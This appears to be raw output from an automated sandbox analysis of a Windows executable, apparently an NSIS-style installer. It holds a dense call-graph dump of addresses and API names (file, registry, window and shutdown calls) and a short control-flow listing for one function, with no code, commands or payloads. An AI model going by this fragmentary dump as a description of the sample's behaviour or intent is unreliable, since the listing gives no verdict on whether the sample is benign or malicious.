                                                                                                                        Total number of Nodes:1291
                                                                                                                        Total number of Limit Nodes:24
402a0c 18 API calls 3776->3777 3778 401962 3777->3778 3779 402a29 18 API calls 3778->3779 3780 40196b 3779->3780 3781 40197e lstrlenA 3780->3781 3782 4019b9 3780->3782 3783 401988 3781->3783 3783->3782 3787 405b98 lstrcpynA 3783->3787 3785 4019a2 3785->3782 3786 4019af lstrlenA 3785->3786 3786->3782 3787->3785 3788 4019d2 3789 402a29 18 API calls 3788->3789 3790 4019d9 3789->3790 3791 402a29 18 API calls 3790->3791 3792 4019e2 3791->3792 3793 4019e9 lstrcmpiA 3792->3793 3794 4019fb lstrcmpA 3792->3794 3795 4019ef 3793->3795 3794->3795 3796 402053 3797 402a29 18 API calls 3796->3797 3798 40205a 3797->3798 3799 402a29 18 API calls 3798->3799 3800 402064 3799->3800 3801 402a29 18 API calls 3800->3801 3802 40206d 3801->3802 3803 402a29 18 API calls 3802->3803 3804 402077 3803->3804 3805 402a29 18 API calls 3804->3805 3807 402081 3805->3807 3806 402095 CoCreateInstance 3809 40216a 3806->3809 3812 4020b4 3806->3812 3807->3806 3808 402a29 18 API calls 3807->3808 3808->3806 3810 401423 25 API calls 3809->3810 3811 40219c 3809->3811 3810->3811 3812->3809 3813 402149 MultiByteToWideChar 3812->3813 3813->3809 3814 4047d3 GetDlgItem GetDlgItem 3815 404827 7 API calls 3814->3815 3823 404a44 3814->3823 3816 4048c0 SendMessageA 3815->3816 3817 4048cd DeleteObject 3815->3817 3816->3817 3818 4048d8 3817->3818 3820 40490f 3818->3820 3822 405bba 18 API calls 3818->3822 3819 404b2e 3821 404bdd 3819->3821 3825 404a37 3819->3825 3830 404b87 SendMessageA 3819->3830 3824 403e54 19 API calls 3820->3824 3826 404bf2 3821->3826 3827 404be6 SendMessageA 3821->3827 3828 4048f1 SendMessageA SendMessageA 3822->3828 3823->3819 3846 404ab8 3823->3846 3867 404753 SendMessageA 3823->3867 3829 404923 3824->3829 3831 403ebb 8 API calls 3825->3831 3838 404c04 ImageList_Destroy 3826->3838 3839 404c0b 3826->3839 3843 404c1b 3826->3843 3827->3826 3828->3818 3834 403e54 19 API calls 3829->3834 3830->3825 3836 404b9c SendMessageA 3830->3836 3837 404dcd 3831->3837 3832 404b20 SendMessageA 3832->3819 3847 
404931 3834->3847 3835 404d81 3835->3825 3844 404d93 ShowWindow GetDlgItem ShowWindow 3835->3844 3841 404baf 3836->3841 3838->3839 3842 404c14 GlobalFree 3839->3842 3839->3843 3840 404a05 GetWindowLongA SetWindowLongA 3845 404a1e 3840->3845 3853 404bc0 SendMessageA 3841->3853 3842->3843 3843->3835 3852 40140b 2 API calls 3843->3852 3861 404c4d 3843->3861 3844->3825 3848 404a24 ShowWindow 3845->3848 3849 404a3c 3845->3849 3846->3819 3846->3832 3847->3840 3851 404980 SendMessageA 3847->3851 3854 4049ff 3847->3854 3856 4049bc SendMessageA 3847->3856 3857 4049cd SendMessageA 3847->3857 3865 403e89 SendMessageA 3848->3865 3866 403e89 SendMessageA 3849->3866 3851->3847 3852->3861 3853->3821 3854->3840 3854->3845 3856->3847 3857->3847 3858 404d57 InvalidateRect 3858->3835 3859 404d6d 3858->3859 3872 40470e 3859->3872 3860 404c7b SendMessageA 3864 404c91 3860->3864 3861->3860 3861->3864 3863 404d05 SendMessageA SendMessageA 3863->3864 3864->3858 3864->3863 3865->3825 3866->3823 3868 4047b2 SendMessageA 3867->3868 3869 404776 GetMessagePos ScreenToClient SendMessageA 3867->3869 3870 4047aa 3868->3870 3869->3870 3871 4047af 3869->3871 3870->3846 3871->3868 3875 404649 3872->3875 3874 404723 3874->3835 3876 40465f 3875->3876 3877 405bba 18 API calls 3876->3877 3878 4046c3 3877->3878 3879 405bba 18 API calls 3878->3879 3880 4046ce 3879->3880 3881 405bba 18 API calls 3880->3881 3882 4046e4 lstrlenA wsprintfA SetDlgItemTextA 3881->3882 3882->3874 3883 404dd4 3884 404de2 3883->3884 3885 404df9 3883->3885 3886 404de8 3884->3886 3901 404e62 3884->3901 3887 404e07 IsWindowVisible 3885->3887 3890 404e1e 3885->3890 3891 403ea0 SendMessageA 3886->3891 3889 404e14 3887->3889 3887->3901 3888 404e68 CallWindowProcA 3892 404df2 3888->3892 3893 404753 5 API calls 3889->3893 3890->3888 3902 405b98 lstrcpynA 3890->3902 3891->3892 3893->3890 3895 404e4d 3903 405af6 wsprintfA 3895->3903 3897 404e54 3898 40140b 2 API calls 3897->3898 3899 404e5b 3898->3899 3904 405b98 lstrcpynA 3899->3904 
3901->3888 3902->3895 3903->3897 3904->3901 3905 4061d4 3911 406058 3905->3911 3906 4069c3 3907 4060e2 GlobalAlloc 3907->3906 3907->3911 3908 4060d9 GlobalFree 3908->3907 3909 406150 GlobalFree 3910 406159 GlobalAlloc 3909->3910 3910->3906 3910->3911 3911->3906 3911->3907 3911->3908 3911->3909 3911->3910 3912 402256 3913 40225e 3912->3913 3918 402264 3912->3918 3914 402a29 18 API calls 3913->3914 3914->3918 3915 402a29 18 API calls 3917 402274 3915->3917 3916 402282 3920 402a29 18 API calls 3916->3920 3917->3916 3919 402a29 18 API calls 3917->3919 3918->3915 3918->3917 3919->3916 3921 40228b WritePrivateProfileStringA 3920->3921 3922 4014d6 3923 402a0c 18 API calls 3922->3923 3924 4014dc Sleep 3923->3924 3926 4028be 3924->3926 3927 40245a 3937 402b33 3927->3937 3929 402464 3930 402a0c 18 API calls 3929->3930 3931 40246d 3930->3931 3932 402490 RegEnumValueA 3931->3932 3933 402484 RegEnumKeyA 3931->3933 3935 40268f 3931->3935 3934 4024a9 RegCloseKey 3932->3934 3932->3935 3933->3934 3934->3935 3938 402a29 18 API calls 3937->3938 3939 402b4c 3938->3939 3940 402b5a RegOpenKeyExA 3939->3940 3940->3929 3941 4022da 3942 40230a 3941->3942 3943 4022df 3941->3943 3945 402a29 18 API calls 3942->3945 3944 402b33 19 API calls 3943->3944 3946 4022e6 3944->3946 3947 402311 3945->3947 3948 402a29 18 API calls 3946->3948 3951 402327 3946->3951 3952 402a69 RegOpenKeyExA 3947->3952 3950 4022f7 RegDeleteValueA RegCloseKey 3948->3950 3950->3951 3957 402a94 3952->3957 3961 402ae0 3952->3961 3953 402aba RegEnumKeyA 3954 402acc RegCloseKey 3953->3954 3953->3957 3955 405f28 5 API calls 3954->3955 3958 402adc 3955->3958 3956 402af1 RegCloseKey 3956->3961 3957->3953 3957->3954 3957->3956 3959 402a69 5 API calls 3957->3959 3960 402b0c RegDeleteKeyA 3958->3960 3958->3961 3959->3957 3960->3961 3961->3951 3962 40155b 3963 401565 3962->3963 3964 401577 ShowWindow 3963->3964 3965 40157e 3963->3965 3964->3965 3966 40158c ShowWindow 3965->3966 3967 4028be 3965->3967 3966->3967 3975 401cde GetDlgItem 
GetClientRect 3976 402a29 18 API calls 3975->3976 3977 401d0e LoadImageA SendMessageA 3976->3977 3978 401d2c DeleteObject 3977->3978 3979 4028be 3977->3979 3978->3979 3980 401dde 3981 402a29 18 API calls 3980->3981 3982 401de4 3981->3982 3983 402a29 18 API calls 3982->3983 3984 401ded 3983->3984 3985 402a29 18 API calls 3984->3985 3986 401df6 3985->3986 3987 402a29 18 API calls 3986->3987 3988 401dff 3987->3988 3989 401423 25 API calls 3988->3989 3990 401e06 ShellExecuteA 3989->3990 3991 401e33 3990->3991 3992 401662 3993 402a29 18 API calls 3992->3993 3994 401669 3993->3994 3995 402a29 18 API calls 3994->3995 3996 401672 3995->3996 3997 402a29 18 API calls 3996->3997 3998 40167b MoveFileA 3997->3998 3999 40168e 3998->3999 4005 401687 3998->4005 4001 405e93 2 API calls 3999->4001 4003 40219c 3999->4003 4000 401423 25 API calls 4000->4003 4002 40169d 4001->4002 4002->4003 4004 4058e6 40 API calls 4002->4004 4004->4005 4005->4000 4006 401ee2 4007 402a29 18 API calls 4006->4007 4008 401ee9 4007->4008 4009 405f28 5 API calls 4008->4009 4010 401ef8 4009->4010 4011 401f10 GlobalAlloc 4010->4011 4016 401f78 4010->4016 4012 401f24 4011->4012 4011->4016 4013 405f28 5 API calls 4012->4013 4014 401f2b 4013->4014 4015 405f28 5 API calls 4014->4015 4017 401f35 4015->4017 4017->4016 4021 405af6 wsprintfA 4017->4021 4019 401f6c 4022 405af6 wsprintfA 4019->4022 4021->4019 4022->4016 4023 4023e2 4024 402b33 19 API calls 4023->4024 4025 4023ec 4024->4025 4026 402a29 18 API calls 4025->4026 4027 4023f5 4026->4027 4028 4023ff RegQueryValueExA 4027->4028 4033 40268f 4027->4033 4029 40241f 4028->4029 4030 402425 RegCloseKey 4028->4030 4029->4030 4034 405af6 wsprintfA 4029->4034 4030->4033 4034->4030 4035 4045e3 4036 4045f3 4035->4036 4037 40460f 4035->4037 4046 40543d GetDlgItemTextA 4036->4046 4039 404642 4037->4039 4040 404615 SHGetPathFromIDListA 4037->4040 4042 40462c SendMessageA 4040->4042 4043 404625 4040->4043 4041 404600 SendMessageA 4041->4037 4042->4039 4044 40140b 2 API 
calls 4043->4044 4044->4042 4046->4041 4047 403f68 lstrcpynA lstrlenA 4048 402b6e 4049 402b7d SetTimer 4048->4049 4051 402b96 4048->4051 4049->4051 4050 402beb 4051->4050 4052 402bb0 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 4051->4052 4052->4050 4053 4014f0 SetForegroundWindow 4054 4028be 4053->4054 4055 402671 4056 402a29 18 API calls 4055->4056 4057 402678 FindFirstFileA 4056->4057 4058 40269b 4057->4058 4059 40268b 4057->4059 4060 4026a2 4058->4060 4063 405af6 wsprintfA 4058->4063 4064 405b98 lstrcpynA 4060->4064 4063->4060 4064->4059 4065 4024f1 4066 4024f6 4065->4066 4067 402507 4065->4067 4069 402a0c 18 API calls 4066->4069 4068 402a29 18 API calls 4067->4068 4070 40250e lstrlenA 4068->4070 4071 4024fd 4069->4071 4070->4071 4072 40252d WriteFile 4071->4072 4073 40268f 4071->4073 4072->4073 4086 4018f5 4087 40192c 4086->4087 4088 402a29 18 API calls 4087->4088 4089 401931 4088->4089 4090 4054bd 70 API calls 4089->4090 4091 40193a 4090->4091 4092 4018f8 4093 402a29 18 API calls 4092->4093 4094 4018ff 4093->4094 4095 405459 MessageBoxIndirectA 4094->4095 4096 401908 4095->4096 3420 4030fb SetErrorMode GetVersion 3421 403133 3420->3421 3422 403139 3420->3422 3423 405f28 5 API calls 3421->3423 3424 405eba 3 API calls 3422->3424 3423->3422 3425 40314f lstrlenA 3424->3425 3425->3422 3426 40315e 3425->3426 3427 405f28 5 API calls 3426->3427 3428 403165 3427->3428 3429 405f28 5 API calls 3428->3429 3430 40316c #17 OleInitialize SHGetFileInfoA 3429->3430 3510 405b98 lstrcpynA 3430->3510 3432 4031a9 GetCommandLineA 3511 405b98 lstrcpynA 3432->3511 3434 4031bb GetModuleHandleA 3435 4031d2 3434->3435 3436 4056b6 CharNextA 3435->3436 3437 4031e6 CharNextA 3436->3437 3443 4031f3 3437->3443 3438 403260 3439 403273 GetTempPathA 3438->3439 3512 4030ca 3439->3512 3441 403289 3444 4032b1 DeleteFileA 3441->3444 3445 40328d GetWindowsDirectoryA lstrcatA 3441->3445 3442 4056b6 CharNextA 3442->3443 3443->3438 3443->3442 3449 403262 3443->3449 3522 402c55 GetTickCount 
GetModuleFileNameA 3444->3522 3447 4030ca 12 API calls 3445->3447 3448 4032a9 3447->3448 3448->3444 3451 403332 ExitProcess OleUninitialize 3448->3451 3606 405b98 lstrcpynA 3449->3606 3450 4032c5 3450->3451 3453 40331e 3450->3453 3457 4056b6 CharNextA 3450->3457 3454 403456 3451->3454 3455 403347 3451->3455 3550 4035eb 3453->3550 3459 4034f9 ExitProcess 3454->3459 3464 405f28 5 API calls 3454->3464 3458 405459 MessageBoxIndirectA 3455->3458 3461 4032dc 3457->3461 3463 403355 ExitProcess 3458->3463 3460 40332e 3460->3451 3468 4032f9 3461->3468 3469 40335d 3461->3469 3465 403469 3464->3465 3466 405f28 5 API calls 3465->3466 3467 403472 3466->3467 3470 405f28 5 API calls 3467->3470 3472 40576c 18 API calls 3468->3472 3471 4053e0 5 API calls 3469->3471 3473 40347b 3470->3473 3474 403362 lstrcatA 3471->3474 3475 403304 3472->3475 3476 403499 3473->3476 3485 403489 GetCurrentProcess 3473->3485 3477 403373 lstrcatA 3474->3477 3478 40337e lstrcatA lstrcmpiA 3474->3478 3475->3451 3607 405b98 lstrcpynA 3475->3607 3481 405f28 5 API calls 3476->3481 3477->3478 3478->3451 3479 40339a 3478->3479 3482 4033a6 3479->3482 3483 40339f 3479->3483 3486 4034d0 3481->3486 3490 4053c3 2 API calls 3482->3490 3488 405346 4 API calls 3483->3488 3484 403313 3608 405b98 lstrcpynA 3484->3608 3485->3476 3487 4034e5 ExitWindowsEx 3486->3487 3492 4034f2 3486->3492 3487->3459 3487->3492 3491 4033a4 3488->3491 3493 4033ab SetCurrentDirectoryA 3490->3493 3491->3493 3494 40140b 2 API calls 3492->3494 3495 4033c5 3493->3495 3496 4033ba 3493->3496 3494->3459 3610 405b98 lstrcpynA 3495->3610 3609 405b98 lstrcpynA 3496->3609 3499 4033d3 3500 405bba 18 API calls 3499->3500 3503 40344a 3499->3503 3504 4058e6 40 API calls 3499->3504 3507 405bba 18 API calls 3499->3507 3508 4053f8 2 API calls 3499->3508 3509 403436 CloseHandle 3499->3509 3501 4033f5 DeleteFileA 3500->3501 3501->3499 3502 403402 CopyFileA 3501->3502 3502->3499 3505 4058e6 40 API calls 3503->3505 3504->3499 3506 403451 3505->3506 3506->3451 
3507->3499 3508->3499 3509->3499 3510->3432 3511->3434 3513 405dfa 5 API calls 3512->3513 3515 4030d6 3513->3515 3514 4030e0 3514->3441 3515->3514 3516 40568b 3 API calls 3515->3516 3517 4030e8 3516->3517 3518 4053c3 2 API calls 3517->3518 3519 4030ee 3518->3519 3611 40589e 3519->3611 3615 40586f GetFileAttributesA CreateFileA 3522->3615 3524 402c95 3544 402ca5 3524->3544 3616 405b98 lstrcpynA 3524->3616 3526 402cbb 3527 4056d2 2 API calls 3526->3527 3528 402cc1 3527->3528 3617 405b98 lstrcpynA 3528->3617 3530 402ccc GetFileSize 3531 402ce3 3530->3531 3547 402dc8 3530->3547 3534 403081 ReadFile 3531->3534 3537 402e34 3531->3537 3531->3544 3546 402bf1 6 API calls 3531->3546 3531->3547 3533 402dd1 3535 402e01 GlobalAlloc 3533->3535 3533->3544 3629 4030b3 SetFilePointer 3533->3629 3534->3531 3630 4030b3 SetFilePointer 3535->3630 3541 402bf1 6 API calls 3537->3541 3539 402dea 3542 403081 ReadFile 3539->3542 3540 402e1c 3543 402e8e 37 API calls 3540->3543 3541->3544 3545 402df5 3542->3545 3548 402e28 3543->3548 3544->3450 3545->3535 3545->3544 3546->3531 3618 402bf1 3547->3618 3548->3544 3549 402e65 SetFilePointer 3548->3549 3549->3544 3551 405f28 5 API calls 3550->3551 3552 4035ff 3551->3552 3553 403617 3552->3553 3555 403605 3552->3555 3554 405a7f 3 API calls 3553->3554 3556 403638 3554->3556 3640 405af6 wsprintfA 3555->3640 3558 403656 lstrcatA 3556->3558 3560 405a7f 3 API calls 3556->3560 3559 403615 3558->3559 3631 4038b4 3559->3631 3560->3558 3563 40576c 18 API calls 3564 403688 3563->3564 3565 403711 3564->3565 3567 405a7f 3 API calls 3564->3567 3566 40576c 18 API calls 3565->3566 3568 403717 3566->3568 3569 4036b4 3567->3569 3570 403727 LoadImageA 3568->3570 3571 405bba 18 API calls 3568->3571 3569->3565 3574 4036d0 lstrlenA 3569->3574 3578 4056b6 CharNextA 3569->3578 3572 403752 RegisterClassA 3570->3572 3573 4037db 3570->3573 3571->3570 3575 4037e5 3572->3575 3576 40378e SystemParametersInfoA CreateWindowExA 3572->3576 3577 40140b 2 API calls 3573->3577 3579 
403704 3574->3579 3580 4036de lstrcmpiA 3574->3580 3575->3460 3576->3573 3581 4037e1 3577->3581 3583 4036ce 3578->3583 3582 40568b 3 API calls 3579->3582 3580->3579 3584 4036ee GetFileAttributesA 3580->3584 3581->3575 3585 4038b4 19 API calls 3581->3585 3586 40370a 3582->3586 3583->3574 3587 4036fa 3584->3587 3588 4037f2 3585->3588 3641 405b98 lstrcpynA 3586->3641 3587->3579 3590 4056d2 2 API calls 3587->3590 3591 403881 3588->3591 3592 4037fe ShowWindow 3588->3592 3590->3579 3642 404f56 OleInitialize 3591->3642 3594 405eba 3 API calls 3592->3594 3596 403816 3594->3596 3595 403887 3597 4038a3 3595->3597 3598 40388b 3595->3598 3599 403824 GetClassInfoA 3596->3599 3601 405eba 3 API calls 3596->3601 3600 40140b 2 API calls 3597->3600 3598->3575 3604 40140b 2 API calls 3598->3604 3602 403838 GetClassInfoA RegisterClassA 3599->3602 3603 40384e DialogBoxParamA 3599->3603 3600->3575 3601->3599 3602->3603 3605 40140b 2 API calls 3603->3605 3604->3575 3605->3575 3606->3439 3607->3484 3608->3453 3609->3495 3610->3499 3612 4058a9 GetTickCount GetTempFileNameA 3611->3612 3613 4058d5 3612->3613 3614 4030f9 3612->3614 3613->3612 3613->3614 3614->3441 3615->3524 3616->3526 3617->3530 3619 402c12 3618->3619 3620 402bfa 3618->3620 3623 402c22 GetTickCount 3619->3623 3624 402c1a 3619->3624 3621 402c03 DestroyWindow 3620->3621 3622 402c0a 3620->3622 3621->3622 3622->3533 3626 402c30 CreateDialogParamA ShowWindow 3623->3626 3627 402c53 3623->3627 3625 405f64 2 API calls 3624->3625 3628 402c20 3625->3628 3626->3627 3627->3533 3628->3533 3629->3539 3630->3540 3632 4038c8 3631->3632 3649 405af6 wsprintfA 3632->3649 3634 403939 3635 405bba 18 API calls 3634->3635 3636 403945 SetWindowTextA 3635->3636 3637 403961 3636->3637 3638 403666 3636->3638 3637->3638 3639 405bba 18 API calls 3637->3639 3638->3563 3639->3637 3640->3559 3641->3565 3643 403ea0 SendMessageA 3642->3643 3644 404f79 3643->3644 3647 401389 2 API calls 3644->3647 3648 404fa0 3644->3648 3645 403ea0 SendMessageA 3646 404fb2 
OleUninitialize 3645->3646 3646->3595 3647->3644 3648->3645 3649->3634 4097 4014fe 4098 401506 4097->4098 4100 401519 4097->4100 4099 402a0c 18 API calls 4098->4099 4099->4100 4101 4025ff 4102 402606 4101->4102 4103 40286b 4101->4103 4104 402a0c 18 API calls 4102->4104 4105 402611 4104->4105 4106 402618 SetFilePointer 4105->4106 4106->4103 4107 402628 4106->4107 4109 405af6 wsprintfA 4107->4109 4109->4103 4110 401000 4111 401037 BeginPaint GetClientRect 4110->4111 4113 40100c DefWindowProcA 4110->4113 4114 4010f3 4111->4114 4117 401179 4113->4117 4115 401073 CreateBrushIndirect FillRect DeleteObject 4114->4115 4116 4010fc 4114->4116 4115->4114 4118 401102 CreateFontIndirectA 4116->4118 4119 401167 EndPaint 4116->4119 4118->4119 4120 401112 6 API calls 4118->4120 4119->4117 4120->4119 3127 403981 3128 403ad4 3127->3128 3129 403999 3127->3129 3130 403b25 3128->3130 3131 403ae5 GetDlgItem GetDlgItem 3128->3131 3129->3128 3132 4039a5 3129->3132 3134 403b7f 3130->3134 3226 401389 3130->3226 3223 403e54 3131->3223 3135 4039b0 SetWindowPos 3132->3135 3136 4039c3 3132->3136 3145 403acf 3134->3145 3200 403ea0 3134->3200 3135->3136 3137 4039e0 3136->3137 3138 4039c8 ShowWindow 3136->3138 3141 403a02 3137->3141 3142 4039e8 DestroyWindow 3137->3142 3138->3137 3139 403b0f SetClassLongA 3143 40140b 2 API calls 3139->3143 3147 403a07 SetWindowLongA 3141->3147 3148 403a18 3141->3148 3146 403dfe 3142->3146 3143->3130 3146->3145 3155 403e0e ShowWindow 3146->3155 3147->3145 3152 403ac1 3148->3152 3153 403a24 GetDlgItem 3148->3153 3150 40140b 2 API calls 3167 403b91 3150->3167 3151 403ddf DestroyWindow EndDialog 3151->3146 3209 403ebb 3152->3209 3156 403a54 3153->3156 3157 403a37 SendMessageA IsWindowEnabled 3153->3157 3154 403b5b SendMessageA 3154->3145 3155->3145 3160 403a61 3156->3160 3162 403aa8 SendMessageA 3156->3162 3163 403a74 3156->3163 3171 403a59 3156->3171 3157->3145 3157->3156 3159 405bba 18 API calls 3159->3167 3160->3162 3160->3171 3162->3152 3164 403a91 3163->3164 3165 
403a7c 3163->3165 3169 40140b 2 API calls 3164->3169 3203 40140b 3165->3203 3166 403a8f 3166->3152 3167->3150 3167->3151 3167->3159 3170 403e54 19 API calls 3167->3170 3173 403e54 19 API calls 3167->3173 3172 403a98 3169->3172 3170->3167 3206 403e2d 3171->3206 3172->3152 3172->3171 3174 403c0c GetDlgItem 3173->3174 3175 403c21 3174->3175 3176 403c29 ShowWindow EnableWindow 3174->3176 3175->3176 3230 403e76 EnableWindow 3176->3230 3178 403c53 EnableWindow 3181 403c67 3178->3181 3179 403c6c GetSystemMenu EnableMenuItem SendMessageA 3180 403c9c SendMessageA 3179->3180 3179->3181 3180->3181 3181->3179 3231 403e89 SendMessageA 3181->3231 3232 405b98 lstrcpynA 3181->3232 3184 403cca lstrlenA 3185 405bba 18 API calls 3184->3185 3186 403cdb SetWindowTextA 3185->3186 3187 401389 2 API calls 3186->3187 3188 403cec 3187->3188 3188->3145 3188->3167 3189 403d1f DestroyWindow 3188->3189 3191 403d1a 3188->3191 3189->3146 3190 403d39 CreateDialogParamA 3189->3190 3190->3146 3192 403d6c 3190->3192 3191->3145 3193 403e54 19 API calls 3192->3193 3194 403d77 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3193->3194 3195 401389 2 API calls 3194->3195 3196 403dbd 3195->3196 3196->3145 3197 403dc5 ShowWindow 3196->3197 3198 403ea0 SendMessageA 3197->3198 3199 403ddd 3198->3199 3199->3146 3201 403eb8 3200->3201 3202 403ea9 SendMessageA 3200->3202 3201->3167 3202->3201 3204 401389 2 API calls 3203->3204 3205 401420 3204->3205 3205->3171 3207 403e34 3206->3207 3208 403e3a SendMessageA 3206->3208 3207->3208 3208->3166 3210 403ed3 GetWindowLongA 3209->3210 3220 403f5c 3209->3220 3211 403ee4 3210->3211 3210->3220 3212 403ef3 GetSysColor 3211->3212 3213 403ef6 3211->3213 3212->3213 3214 403f06 SetBkMode 3213->3214 3215 403efc SetTextColor 3213->3215 3216 403f24 3214->3216 3217 403f1e GetSysColor 3214->3217 3215->3214 3218 403f35 3216->3218 3219 403f2b SetBkColor 3216->3219 3217->3216 3218->3220 3221 403f48 DeleteObject 3218->3221 3222 403f4f CreateBrushIndirect 3218->3222 3219->3218 
3220->3145 3221->3222 3222->3220 3224 405bba 18 API calls 3223->3224 3225 403e5f SetDlgItemTextA 3224->3225 3225->3139 3227 401390 3226->3227 3228 4013fe 3227->3228 3229 4013cb MulDiv SendMessageA 3227->3229 3228->3134 3228->3154 3229->3227 3230->3178 3231->3181 3232->3184 4121 401b02 4122 402a29 18 API calls 4121->4122 4123 401b09 4122->4123 4124 402a0c 18 API calls 4123->4124 4125 401b12 wsprintfA 4124->4125 4126 4028be 4125->4126 4127 401a03 4128 402a29 18 API calls 4127->4128 4129 401a0c ExpandEnvironmentStringsA 4128->4129 4130 401a20 4129->4130 4132 401a33 4129->4132 4131 401a25 lstrcmpA 4130->4131 4130->4132 4131->4132 4133 401f84 4134 401f96 4133->4134 4144 402045 4133->4144 4135 402a29 18 API calls 4134->4135 4136 401f9d 4135->4136 4138 402a29 18 API calls 4136->4138 4137 401423 25 API calls 4139 40219c 4137->4139 4140 401fa6 4138->4140 4141 401fbb LoadLibraryExA 4140->4141 4142 401fae GetModuleHandleA 4140->4142 4143 401fcb GetProcAddress 4141->4143 4141->4144 4142->4141 4142->4143 4145 402018 4143->4145 4146 401fdb 4143->4146 4144->4137 4147 404e84 25 API calls 4145->4147 4148 401423 25 API calls 4146->4148 4149 401feb 4146->4149 4147->4149 4148->4149 4149->4139 4150 402039 FreeLibrary 4149->4150 4150->4139 4165 401c8a 4166 402a0c 18 API calls 4165->4166 4167 401c90 IsWindow 4166->4167 4168 4019f3 4167->4168 4169 401490 4170 404e84 25 API calls 4169->4170 4171 401497 4170->4171 3233 403511 3234 403529 3233->3234 3235 40351b CloseHandle 3233->3235 3240 403556 3234->3240 3235->3234 3241 403564 3240->3241 3242 40352e 3241->3242 3243 403569 FreeLibrary GlobalFree 3241->3243 3244 4054bd 3242->3244 3243->3242 3243->3243 3286 40576c 3244->3286 3247 4054f1 3250 405626 3247->3250 3300 405b98 lstrcpynA 3247->3300 3248 4054da DeleteFileA 3249 40353a 3248->3249 3250->3249 3257 405e93 2 API calls 3250->3257 3252 40551b 3253 40552c 3252->3253 3254 40551f lstrcatA 3252->3254 3301 4056d2 lstrlenA 3253->3301 3255 405532 3254->3255 3258 405540 lstrcatA 3255->3258 3260 
40554b lstrlenA FindFirstFileA 3255->3260 3259 40564b 3257->3259 3258->3260 3259->3249 3261 40568b 3 API calls 3259->3261 3260->3250 3281 40556f 3260->3281 3263 405655 3261->3263 3262 4056b6 CharNextA 3262->3281 3264 405850 2 API calls 3263->3264 3265 40565b RemoveDirectoryA 3264->3265 3266 405666 3265->3266 3267 40567d 3265->3267 3266->3249 3269 40566c 3266->3269 3270 404e84 25 API calls 3267->3270 3272 404e84 25 API calls 3269->3272 3270->3249 3271 405605 FindNextFileA 3273 40561d FindClose 3271->3273 3271->3281 3275 405674 3272->3275 3273->3250 3274 4055cc 3277 405850 2 API calls 3274->3277 3276 4058e6 40 API calls 3275->3276 3279 40567b 3276->3279 3280 4055d2 DeleteFileA 3277->3280 3278 4054bd 61 API calls 3278->3281 3279->3249 3285 4055dd 3280->3285 3281->3262 3281->3271 3281->3274 3281->3278 3305 405b98 lstrcpynA 3281->3305 3282 404e84 25 API calls 3282->3271 3283 404e84 25 API calls 3283->3285 3285->3271 3285->3282 3285->3283 3306 4058e6 3285->3306 3332 405b98 lstrcpynA 3286->3332 3288 40577d 3333 40571f CharNextA CharNextA 3288->3333 3291 4054d1 3291->3247 3291->3248 3292 405dfa 5 API calls 3298 405793 3292->3298 3293 4057be lstrlenA 3294 4057c9 3293->3294 3293->3298 3295 40568b 3 API calls 3294->3295 3297 4057ce GetFileAttributesA 3295->3297 3296 405e93 2 API calls 3296->3298 3297->3291 3298->3291 3298->3293 3298->3296 3299 4056d2 2 API calls 3298->3299 3299->3293 3300->3252 3302 4056df 3301->3302 3303 4056f0 3302->3303 3304 4056e4 CharPrevA 3302->3304 3303->3255 3304->3302 3304->3303 3305->3281 3339 405f28 GetModuleHandleA 3306->3339 3309 40594e GetShortPathNameA 3310 405963 3309->3310 3314 405a43 3309->3314 3313 40596b wsprintfA 3310->3313 3310->3314 3312 405932 CloseHandle GetShortPathNameA 3312->3314 3315 405946 3312->3315 3316 405bba 18 API calls 3313->3316 3314->3285 3315->3309 3315->3314 3317 405993 3316->3317 3346 40586f GetFileAttributesA CreateFileA 3317->3346 3319 4059a0 3319->3314 3320 4059af GetFileSize GlobalAlloc 3319->3320 3321 405a3c 
CloseHandle 3320->3321 3322 4059cd ReadFile 3320->3322 3321->3314 3322->3321 3323 4059e1 3322->3323 3323->3321 3347 4057e4 lstrlenA 3323->3347 3326 405a50 3329 4057e4 4 API calls 3326->3329 3327 4059f6 3352 405b98 lstrcpynA 3327->3352 3330 405a04 3329->3330 3331 405a17 SetFilePointer WriteFile GlobalFree 3330->3331 3331->3321 3332->3288 3334 405739 3333->3334 3336 405745 3333->3336 3335 405740 CharNextA 3334->3335 3334->3336 3338 405762 3335->3338 3337 4056b6 CharNextA 3336->3337 3336->3338 3337->3336 3338->3291 3338->3292 3340 405f44 3339->3340 3341 405f4e GetProcAddress 3339->3341 3353 405eba GetSystemDirectoryA 3340->3353 3343 4058f1 3341->3343 3343->3309 3343->3314 3345 40586f GetFileAttributesA CreateFileA 3343->3345 3344 405f4a 3344->3341 3344->3343 3345->3312 3346->3319 3348 40581a lstrlenA 3347->3348 3349 405824 3348->3349 3350 4057f8 lstrcmpiA 3348->3350 3349->3326 3349->3327 3350->3349 3351 405811 CharNextA 3350->3351 3351->3348 3352->3330 3355 405edc wsprintfA LoadLibraryExA 3353->3355 3355->3344 4179 404292 4180 4042be 4179->4180 4181 4042cf 4179->4181 4240 40543d GetDlgItemTextA 4180->4240 4183 4042db GetDlgItem 4181->4183 4188 40433a 4181->4188 4185 4042ef 4183->4185 4184 4042c9 4187 405dfa 5 API calls 4184->4187 4190 404303 SetWindowTextA 4185->4190 4195 40571f 4 API calls 4185->4195 4186 40441e 4238 4045c8 4186->4238 4242 40543d GetDlgItemTextA 4186->4242 4187->4181 4188->4186 4192 405bba 18 API calls 4188->4192 4188->4238 4193 403e54 19 API calls 4190->4193 4191 40444e 4196 40576c 18 API calls 4191->4196 4197 4043ae SHBrowseForFolderA 4192->4197 4198 40431f 4193->4198 4194 403ebb 8 API calls 4199 4045dc 4194->4199 4200 4042f9 4195->4200 4201 404454 4196->4201 4197->4186 4202 4043c6 CoTaskMemFree 4197->4202 4203 403e54 19 API calls 4198->4203 4200->4190 4204 40568b 3 API calls 4200->4204 4243 405b98 lstrcpynA 4201->4243 4205 40568b 3 API calls 4202->4205 4206 40432d 4203->4206 4204->4190 4207 4043d3 4205->4207 4241 403e89 SendMessageA 4206->4241 

                                                                                                                        Control-flow Graph: function at 004030FB
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNELBASE ref: 00403121
                                                                                                                        • GetVersion.KERNEL32 ref: 00403127
                                                                                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403150
                                                                                                                        • #17.COMCTL32(0000000B,0000000D), ref: 00403171
                                                                                                                        • OleInitialize.OLE32(00000000), ref: 00403178
                                                                                                                        • SHGetFileInfoA.SHELL32(0041F4F0,00000000,?,00000160,00000000), ref: 00403194
